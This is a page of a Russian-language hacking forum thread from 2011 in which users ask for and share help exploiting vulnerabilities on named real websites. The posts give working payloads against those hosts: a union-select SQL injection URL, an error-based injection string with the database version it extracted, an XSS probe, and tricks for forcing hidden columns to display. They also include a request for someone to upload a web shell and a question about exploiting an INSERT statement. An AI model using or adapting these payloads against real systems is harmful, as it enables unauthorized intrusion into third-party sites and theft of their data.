HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18261  
Старый 05.10.2011, 19:17
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от z0mbie86  
Помогите раскрутить http://217.8.80.55/?m[admin]&id=1'
Имхо, это не скуля.

Нужен админский доступ - заюзай XSS лучше

Код:
http://217.8.80.55/?m[search]&search_block_num=alert(/Its XSS, Baby/)
 
Ответить с цитированием

  #18262  
Старый 05.10.2011, 19:29
z0mbie86
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами: 8840513

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
Имхо, это не скуля.
Нужен админский доступ - заюзай XSS лучше
Там доступ в админку была но теперь сама админка удалена.
 
Ответить с цитированием

  #18263  
Старый 05.10.2011, 20:07
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от alexvrn  
Можно ли раскрутит такую скулю id=1' ?
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY image_order LIMIT 2' at line 1
Помогите пожалуйста
Мне тока что с таким сообщением стукнули в аську, ДА МОЖНО, но прежде чем это сделать, нужно хотя бы пару статеек по скулям почитать и понять что к чему, скуля там очень простая:

Цитата:
Сообщение от None  
_http://www.mallorca-properties.co.uk/index.php/globals/_slideshow-images_en/?entry_id=1'
там фильтруются скобки, а вы навернека первым делом встевели что то типо version()

вообщем вот ваше начало:

Цитата:
Сообщение от None  
http://www.mallorca-properties.co.uk/index.php/globals/_slideshow-images_en/?entry_id=-1+union+select+1,2+--+
а дальше хоть немножко напрегите свои извилены!
 
Ответить с цитированием

  #18264  
Старый 05.10.2011, 20:11
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от z0mbie86  
Помогите раскрутить http://217.8.80.55/?m[admin]&id=1'
Код:
https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
version(): 5.0.67
 
Ответить с цитированием

  #18265  
Старый 06.10.2011, 03:16
Leon2k
Новичок
Регистрация: 25.05.2011
Сообщений: 1
С нами: 7877846

Репутация: 0
По умолчанию

Привет если есть кто умеет лить шелл отпишитесь в личку пожалуйста или аську в личку.
 
Ответить с цитированием

  #18266  
Старый 06.10.2011, 03:16
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Доброго здравия форумчане!

В общем ищу где можно почитать про PostgreSQL

Нашёл такую скулю на сайте, а как попросить его показать мне пароль админа не знаю,

Помогите убедить сайт.

Leon2k

Можешь обратиться в личку, всё что знаю расскажу!
 
Ответить с цитированием

  #18267  
Старый 06.10.2011, 07:49
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
Доброго здравия форумчане!
В общем ищу где можно почитать про
PostgreSQL
Проведение SQL-Injection в PostgreSQL
 
Ответить с цитированием

  #18268  
Старый 07.10.2011, 01:30
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от OxoTnik  
такая проблема
Узнал таблицы, колонки, а в нужных колонках он не показывает нужную инфу
Как в этом случае его вытащить??
Ввёл точно все правильно!
Возможно, придётся поработать с выводом, чтото вроде

Код:
unhex(hex(%Visible_Col%)) или AES_DECRYPT(AES_ENCRYPT(%Visible_Col%,0x 71),0x71)
где %Visible_Col% - выводимая колонка в запросе

всё зависит от случая
 
Ответить с цитированием

  #18269  
Старый 07.10.2011, 02:36
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от OxoTnik  
Только где про это почитать?
В любой статье по SQL-иньекциям.

/thread43966.html

/thread104591.html
 
Ответить с цитированием

  #18270  
Старый 07.10.2011, 11:53
Mr.aids
Новичок
Регистрация: 19.02.2011
Сообщений: 10
С нами: 8014646

Репутация: 0
По умолчанию

insert into помогите с injection

запрос вида

log.php?ver=1.0.1.130'

Ошибка при занесении информации в базу.

118 ******/log.php

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25

INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }

все параметры строковые, можно как то вставить union+select?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.